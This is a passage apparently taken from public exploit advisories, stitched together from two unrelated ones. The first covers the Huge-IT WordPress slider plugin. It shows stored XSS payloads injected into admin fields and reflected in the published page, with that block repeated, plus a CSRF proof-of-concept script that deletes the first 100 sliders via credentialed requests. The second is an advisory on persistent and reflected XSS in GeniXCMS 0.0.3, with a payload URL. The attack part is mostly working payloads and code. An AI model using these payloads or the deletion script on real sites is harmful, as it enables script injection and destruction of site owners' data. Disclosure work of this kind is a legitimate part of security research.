<textarea id="im_description14" name="im_description14" >as</textarea><script>alert(/i0akiN_HACK/);</script></textarea>
</div>
<div class="link-block">
<label for="sl_url14">URL:</label>
<input class="text_area url-input" type="text" id="sl_url14" name="sl_url14" value="" onmouseover=alert(/i0akiN_hack/) a="" >
<label class="long" for="sl_link_target14">Open in new tab</label>
<input type="hidden" name="sl_link_target14" value="" />
<input class="link_target" type="checkbox" id="sl_link_target14" name="sl_link_target14" />
</div>
<div class="remove-image-container">
<a class="button remove-image" href="admin.php?page=sliders_huge_it_slider&id=2&task=apply&removeslide=14">Remove Image</a>
</div>
</div>
<div class="clear"></div>
</li>
</ul>
</div>
</div>
<div id="postbox-container-1" class="postbox-container">
<div id="side-sortables" class="meta-box-sortables ui-sortable">
<div id="slider-unique-options" class="postbox">
...
<li>
<label for="sl_pausetime">Pause time</label>
<input type="text" name="sl_pausetime" id="sl_pausetime" value="" onmouseover=alert(/i0akiN_hack/) a="" class="text_area" />
</li>
<li>
<label for="sl_changespeed">Change speed</label>
<input type="text" name="sl_changespeed" id="sl_changespeed" value="" onmouseover=alert(/i0akiN_hack/) a="" class="text_area" />
</li>
...
-----------------------------------------
RESPONSE PUBLISHED PAGE WITH IMAGE SLIDER
-----------------------------------------
...
<script>
var data_2 = [];
var event_stack_2 = [];
video_is_playing_2 = false;
data_2["0"] = []; data_2["0"]["id"] = "0"; data_2["0"]["image_url"] = "" onmouseover = alert(/i0akiN_hack/) a = ""; data_2["0"]["description"] = "as</textarea>
<script>alert(/i0akiN_HACK/);</script>";data_2["0"]["alt"]="' onmouseover=alert(/i0akiN_hack/) a='";
===<!-- SUCCESFULL INJECTION :) -->===
var huge_it_trans_in_progress_2 = false;
var huge_it_transition_duration_2 = " onmouseover=alert(/i0akiN_hack/) a=";
var huge_it_playInterval_2;
// Stop autoplay.
window.clearInterval(huge_it_playInterval_2);
....
<!-- ##########################IMAGES######################### -->
<div id="huge_it_slideshow_image_container_2" class="huge_it_slideshow_image_container_2">
<div class="huge_it_slide_container_2">
<div class="huge_it_slide_bg_2">
<ul class="huge_it_slider_2">
<li class="huge_it_slideshow_image_item_2" id="image_id_2_0">
<a href="" onmouseover=alert(/i0akiN_hack/) a="" ><img id="huge_it_slideshow_image_2" class="huge_it_slideshow_image_2"
src="" onmouseover=alert(/i0akiN_hack/) a="" image_id="14" />
</a>
<div class="huge_it_slideshow_title_text_2 "> " onmouseover=alert(/i0akiN_hack/) a="</div>
<div class="huge_it_slideshow_description_text_2 ">as</textarea><script>alert(/i0akiN_HACK/);</script> </div>
</li>
<input type="hidden" id="huge_it_current_image_key_2" value="0" />
</ul>
</div>
</div>
</div>
...
-----------------------------------------
RESPONSE PUBLISHED PAGE WITH IMAGE SLIDER
-----------------------------------------
...
<script>
var data_2 = [];
var event_stack_2 = [];
video_is_playing_2 = false;
data_2["0"] = []; data_2["0"]["id"] = "0"; data_2["0"]["image_url"] = "" onmouseover = alert(/i0akiN_hack/) a = ""; data_2["0"]["description"] = "as</textarea>
<script>alert(/i0akiN_HACK/);</script>";data_2["0"]["alt"]="' onmouseover=alert(/i0akiN_hack/) a='";
===<!-- SUCCESFULL INJECTION :) -->===
var huge_it_trans_in_progress_2 = false;
var huge_it_transition_duration_2 = " onmouseover=alert(/i0akiN_hack/) a=";
var huge_it_playInterval_2;
// Stop autoplay.
window.clearInterval(huge_it_playInterval_2);
....
<!-- ##########################IMAGES######################### -->
<div id="huge_it_slideshow_image_container_2" class="huge_it_slideshow_image_container_2">
<div class="huge_it_slide_container_2">
<div class="huge_it_slide_bg_2">
<ul class="huge_it_slider_2">
<li class="huge_it_slideshow_image_item_2" id="image_id_2_0">
<a href="" onmouseover=alert(/i0akiN_hack/) a="" ><img id="huge_it_slideshow_image_2" class="huge_it_slideshow_image_2"
src="" onmouseover=alert(/i0akiN_hack/) a="" image_id="14" />
</a>
<div class="huge_it_slideshow_title_text_2 "> " onmouseover=alert(/i0akiN_hack/) a="</div>
<div class="huge_it_slideshow_description_text_2 ">as</textarea><script>alert(/i0akiN_HACK/);</script> </div>
</li>
<input type="hidden" id="huge_it_current_image_key_2" value="0" />
</ul>
</div>
</div>
</div>
...
====================================
* CSRF & ARBITRARY SLIDER DELETION
====================================
=====================
POC
=====================
//delete first 100 sliders
<script>
function sendData( id_slider ){
var req=new XMLHttpRequest();
req.open("GET","http://localhost/wordpress/wp-admin/admin.php?page=sliders_huge_it_slider&task=remove_cat&id="+id_slider,true);
req.withCredentials="true";
req.send();
}
for(var i=0;i<100;i++){
sendData( i );
}
</script>
token authentication not found!
# Exploit Title: Persistent XSS
# Google Dork: intitle: Persistent XSS
# Date: 2015-06-21
# Exploit Author: John Page ( hyp3rlinx )
# Website: hyp3rlinx.altervista.org
# Vendor Homepage: genixcms.org
# Software Link: genixcms.org
# Version: 0.0.3
# Tested on: windows 7
# Category: webapps
Vendor:
=============================================
genixcms.org
Product:
=====================================================
GeniXCMS v0.0.3 is a PHP based content management system
Advisory Information:
===================================================
Multiple persistent & reflected XSS vulnerabilities
Vulnerability Details:
=========================================================
GeniXCMS v0.0.3 is vulnerable to persistent and reflected XSS
XSS Exploit code(s):
====================
Persistent XSS:
-----------------------
http://localhost/GeniXCMS-master/GeniXCMS-master/gxadmin/index.php?page=posts&act=add&token=
1-content input field
content injected XSS will execute after posting is published
2-title input field
title injected XSS will execute immediate.
Relected XSS:
---------------------
http://localhost/GeniXCMS-master/GeniXCMS-master/gxadmin/index.php?page=posts&q=1'<script>alert('XSS By Hyp3rlinx')</script>
Disclosure Timeline:
=========================================================
Vendor Notification: NA
June 21, 2015 : Public Disclosure
Severity Level:
=========================================================
Med
Description:
=========================================================
Request Method(s): [+] GET & POST
Vulnerable Product: [+] GeniXCMS 0.0.3
Vulnerable Parameter(s): [+] q, content & title
Affected Area(s): [+] index.php
===============================================================
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided that
it is not altered except by reformatting it, and that due credit is given. Permission is
explicitly given for insertion in vulnerability databases and similar, provided that
due credit is given to the author. The author is not responsible for any misuse of the
information contained herein and prohibits any malicious use of all security related
information or exploits by the author or elsewhere.
(hyp3rlinx)